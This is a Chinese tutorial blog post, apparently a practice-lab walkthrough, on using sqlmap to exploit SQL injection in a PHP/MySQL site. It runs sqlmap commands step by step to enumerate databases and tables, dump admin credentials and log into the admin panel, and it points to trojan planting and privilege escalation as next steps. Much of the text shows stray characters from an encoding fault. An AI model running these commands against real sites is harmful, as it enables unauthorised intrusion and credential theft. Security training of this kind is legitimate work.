SQLMap之mysql數(shù)據(jù)庫注入

1.9?(實驗)如何使用SQLMap進(jìn)行MySQL數(shù)據(jù)庫注入

第一步:打開目標(biāo)地址,先手工檢查一下是否存在注入點。

http://www.any.com/wcms/show.php?id=33頁面正常

http://www.any.com/wcms/show.php?id=33'正常報錯

說明存在注入漏洞。下面使用sqlmap進(jìn)行SQL注入操作。

第二步:使用sqlmap判斷一下是否存在注入漏洞(主要是看能否返回信息)

python?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33

使用的參數(shù)是-u,意思是url。當(dāng)給sqlmap這么一個url的時候,它會判斷可注入的參數(shù);判斷可以用那種SQL注入技術(shù)來注入;識別出哪種數(shù)據(jù)庫;根據(jù)用戶選擇,讀取哪些數(shù)據(jù)。實驗結(jié)果如下圖:

如果遇到類似于下圖箭頭所指的選擇,直接點擊回車即可。

最終結(jié)果如下圖所示:

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

Web服務(wù)器的系統(tǒng)是Windows;web應(yīng)用技術(shù)的PHP版本是5.3.29,Apache版本是2.4.10;后臺數(shù)據(jù)庫使用的是MySQL,版本大于5.5。

第三步:獲取數(shù)據(jù)庫信息。

python?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33?--dbs#獲取所有數(shù)據(jù)庫信息

得到的數(shù)據(jù)庫結(jié)果如下圖:

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

?系統(tǒng)由10個可以使用的數(shù)據(jù)庫,名稱分別是510cms,challenges,cms,dvwa,efucms,information_schema,mysql,performation_schema,security,test。


獲取當(dāng)前數(shù)據(jù)庫的信息使用的命令是python?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33?--current-db#獲取當(dāng)前數(shù)據(jù)庫信息

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

?當(dāng)前網(wǎng)頁使用的數(shù)據(jù)庫名稱是cms。

第四步:指定庫名列出所有表

python.exe?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33?-D?cms?--tables使用參數(shù)-D來指定數(shù)據(jù)庫為cms,使用參數(shù)--tables來確定獲取的內(nèi)容是cms數(shù)據(jù)庫內(nèi)的表的名稱。

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

?當(dāng)前網(wǎng)頁使用的數(shù)據(jù)庫名稱是cms。進(jìn)一步獲取到了cms庫所有的表,cms數(shù)據(jù)庫中的數(shù)據(jù)表有8個,名稱分別是cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users,我們更關(guān)注cms_users這個表。根據(jù)經(jīng)驗,這里面存儲著后臺的管理賬號和密碼。

第五步:指定庫名表名列出所有字段。

python.exe?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33?-D?cms?-T?cms_users?--columns使用參數(shù)-D來指定數(shù)據(jù)庫為cms,使用-T來指定數(shù)據(jù)表的名稱是cms_users,使用參數(shù)--columns來確定獲取的內(nèi)容是cms數(shù)據(jù)庫內(nèi)的cms_users表中列的名稱。

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

?當(dāng)前網(wǎng)頁使用的數(shù)據(jù)庫名稱是cms。數(shù)據(jù)表的名稱是cms_users。在這個表中有三個字段,字段名稱分別是password,userid,username,字符類型分別是最長是32位的字符型,最長為11位的整型和最長是20位的字符型數(shù)據(jù)。理論上password、和username分別存儲著密碼和用戶名。

第六步:指定庫名表名字段列出指定字段

python.exe?sqlmap/sqlmap.py?-u?http://www.any.com/wcms/show.php?id=33?-D?cms?-T?cms_users?-C?username,password?--dump使用參數(shù)-D來指定數(shù)據(jù)庫為cms,使用-T來指定數(shù)據(jù)表的名稱是cms_users,使用-C來指定數(shù)據(jù)表中列的名稱是username和password,使用參數(shù)--dump來確定獲取的內(nèi)容是cms數(shù)據(jù)庫內(nèi)的cms_users表中的username和password列的內(nèi)容字段。

在執(zhí)行過程中,會需要我們屬于選擇一下y或者n,默認(rèn)的是大寫選項,默認(rèn)即可(一直按Enter鍵即可)。

最終實驗結(jié)果結(jié)果如圖所示:

對最終結(jié)果的分析(上圖中紅框內(nèi)的部分):

當(dāng)前網(wǎng)頁使用的數(shù)據(jù)庫名稱是cms。數(shù)據(jù)表的名稱是cms_users。在這個表中的username和password對應(yīng)的內(nèi)容分別是?admin?和123456。

第七步:在后臺登陸一下。至于后臺的查找,我們可以通過御劍這款專業(yè)的后臺查找工具,后續(xù)實驗中會有詳細(xì)的介紹,這里不再贅述。

使用的網(wǎng)址是http://www.any.com/wcms/admin/login.php

輸入用戶名和密碼?admin 123456

?登陸成功。關(guān)于sqlmap的入侵整個實驗過程已經(jīng)結(jié)束,后續(xù)的工作就是掛馬提權(quán),這些內(nèi)容也會在后續(xù)的實驗中進(jìn)行詳細(xì)的介紹。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 1.7(實驗)如何使用SQLMap進(jìn)行注入指定數(shù)據(jù)庫、操作系統(tǒng) 第一步:打開目標(biāo)地址,先手工檢查一下是否存在注入點...
    小哥哥_020e閱讀 27,541評論 0 3
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進(jìn)行修正,并標(biāo)注對自己有用的信息。 ======...
    wind_飄閱讀 2,207評論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,563評論 2 22
  • 關(guān)于Mongodb的全面總結(jié) MongoDB的內(nèi)部構(gòu)造《MongoDB The Definitive Guide》...
    中v中閱讀 32,311評論 2 89
  • 一年前我臉上是沒有皺紋的,大家都以為我是高中生。 今年,大家對我的認(rèn)知就變正常了,說我看起來不像是三十歲的人。 我...
    卞秋杭閱讀 245評論 0 0

友情鏈接更多精彩內(nèi)容